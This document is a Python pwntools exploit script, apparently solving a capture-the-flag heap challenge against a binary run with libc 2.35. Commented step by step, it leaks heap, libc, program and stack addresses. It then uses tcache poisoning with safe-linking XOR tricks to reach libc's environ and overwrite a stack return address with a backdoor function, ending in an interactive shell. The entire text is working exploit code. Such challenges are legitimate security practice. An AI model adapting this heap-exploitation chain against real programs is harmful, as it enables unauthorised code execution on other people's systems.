from
pwn
import
*
# Target binary and the exact libc/ld builds it is expected to run against.
# The offsets used further down are specific to these files; swapping in a
# different libc build invalidates them.
elf = ELF("./pwn")
libc = ELF("./libc-2.35.so")
ld = ELF('./ld-2.35.so')  # loaded but not referenced anywhere else in this script

# Launch the binary locally and mirror its arch/os into the pwntools context
# so that p64()/u64() pack for the right word size and endianness.
p = process([elf.path])
context.update(arch=elf.arch, os=elf.os)
# 'debug' echoes every byte sent to and received from the process.
context.log_level = 'debug'
def add_chunk(size):
    """Drive menu option 1 / sub-choice 1 to allocate a chunk of `size` bytes.

    Answers the three prompts in order: the main "edit" menu, the "choose?"
    sub-menu, and the "size:" prompt (size sent as decimal text).
    """
    answers = (
        (b"edit\n", b"1"),
        (b"choose?\n", b"1"),
        (b"size:", str(size).encode()),
    )
    for prompt, reply in answers:
        p.sendlineafter(prompt, reply)
def delete_chunk():
    """Select menu option 2 (free the current chunk) at the "edit" prompt."""
    menu_prompt = b"edit\n"
    choice = b"2"
    p.sendlineafter(menu_prompt, choice)
def show_chunk():
    """Select menu option 3 (print the current chunk) at the "edit" prompt.

    The printed bytes are consumed afterwards by decrypt().
    """
    menu_prompt = b"edit\n"
    choice = b"3"
    p.sendlineafter(menu_prompt, choice)
def edit_chunk(content):
    """Select menu option 4 and write `content` at the "data:" prompt.

    `content` is raw bytes; sendafter (not sendlineafter) is used on purpose
    so no trailing newline is appended to the payload.
    """
    steps = (
        (p.sendlineafter, b"edit\n", b"4"),
        (p.sendafter, b"data:", content),
    )
    for send, prompt, payload in steps:
        send(prompt, payload)
def decrypt():
    """Read the 7 bytes the program prints after "the data:" and undo its XOR.

    Byte i is XOR-ed with (i + 153); the same operation reverses it. Returns
    the 7 decoded bytes, which callers pad to 8 with ljust() before u64().

    Note: p.recv(7) may return fewer than 7 bytes on a short read, in which
    case indexing raises IndexError.
    """
    p.recvuntil(b"the data:")
    raw = p.recv(7)
    return bytes(raw[i] ^ (i + 153) for i in range(7))
# ---- leak 1: heap base -----------------------------------------------------
# Allocate, free, then show the freed chunk; decrypt() yields 7 bytes that,
# shifted left by 12, give a page-aligned heap base.
add_chunk(0x88)
delete_chunk()
show_chunk()
heap_base = u64(decrypt().ljust(8, b'\x00')) << 12
success("heap_base = " + hex(heap_base))

# ---- leak 2: libc base -----------------------------------------------------
add_chunk(0x418)
# Same menu path as add_chunk(), but sub-choice "2" and no size is sent
# (what sub-choice 2 does is not visible from this script).
p.sendlineafter(b"edit\n", b"1")
p.sendlineafter(b"choose?\n", b"2")
delete_chunk()
show_chunk()
# 0x242ce0 and 0x50000 are constants tied to this libc-2.35 build; they will
# not carry over to another libc.
libc_base = u64(decrypt().ljust(8, b'\x00')) - 0x242ce0 + 0x50000
libc.address = libc_base
environ = libc.sym['environ']
success("libc_base = " + hex(libc_base))
success("environ = " + hex(environ))

# ---- leak 3: program base via menu option 5 --------------------------------
add_chunk(0x88)
delete_chunk()
p.sendlineafter(b"edit\n", b"5")
p.recvuntil(b"address: ")
# Assumes the address is printed as exactly 14 characters ("0x" + 12 hex
# digits). A shorter print leaves unconsumed bytes and makes int() raise
# ValueError; a short recv() has the same effect.
backdoor = int(p.recv(14), 16)
elf_base = backdoor - 0x12be  # 0x12be: offset of the printed address within this binary
success("elf_base = " + hex(elf_base))
success("backdoor = " + hex(backdoor))
# Option 5 also prompts for data; 16 zero bytes are written here.
p.sendafter(b'data:', p64(0) + p64(0))

# ---- heap write sequence ---------------------------------------------------
delete_chunk()
target = heap_base + 0x10
# Precedence: >> binds tighter than ^, so this is (heap_base >> 12) ^ target,
# the same form written with explicit parentheses below.
edit_chunk(p64(heap_base >> 12 ^ target))
add_chunk(0x88)
add_chunk(0x88)
delete_chunk()
edit_chunk(p64(0))
# Cycle three sizes through allocate/free, then write four 16-bit values
# (2, 2, 0, 0) into the chunk freed last.
add_chunk(0x18)
delete_chunk()
add_chunk(0x28)
delete_chunk()
add_chunk(0x288)
delete_chunk()
edit_chunk(p16(2) + p16(2) + p16(0) + p16(0))

# ---- leak 4: stack address -------------------------------------------------
add_chunk(0x18)
delete_chunk()
edit_chunk(p64((heap_base >> 12) ^ environ))
add_chunk(0x18)
# The second 0x18 allocation is expected to overlap libc's environ; the
# following show prints its contents, which the script treats as a stack
# address (environ holds a pointer into the stack).
add_chunk(0x18)
show_chunk()
stack_addr = u64(decrypt().ljust(8, b'\x00'))
success("stack_addr = " + hex(stack_addr))

# ---- final writes ----------------------------------------------------------
add_chunk(0x28)
delete_chunk()
target = elf_base + 0x4040  # 0x4040: build-specific offset within the binary
edit_chunk(p64((heap_base >> 12) ^ target))
add_chunk(0x28)
add_chunk(0x28)
# `target` is rebound a third time; 0x140 is a stack-layout offset that only
# holds for this binary/environment.
target = stack_addr - 0x140
edit_chunk(p64(target))
# Two consecutive edits with no allocation in between: presumably the first
# redirects where the second write lands — not verifiable from this script.
edit_chunk(p64(backdoor + 8))
p.interactive()